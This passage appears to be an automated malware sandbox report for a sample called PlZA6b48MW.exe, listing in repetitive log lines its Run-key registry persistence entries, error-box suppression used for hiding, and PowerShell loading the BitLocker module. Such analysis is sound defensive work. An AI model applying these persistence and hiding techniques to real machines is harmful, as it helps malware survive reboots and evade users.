                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
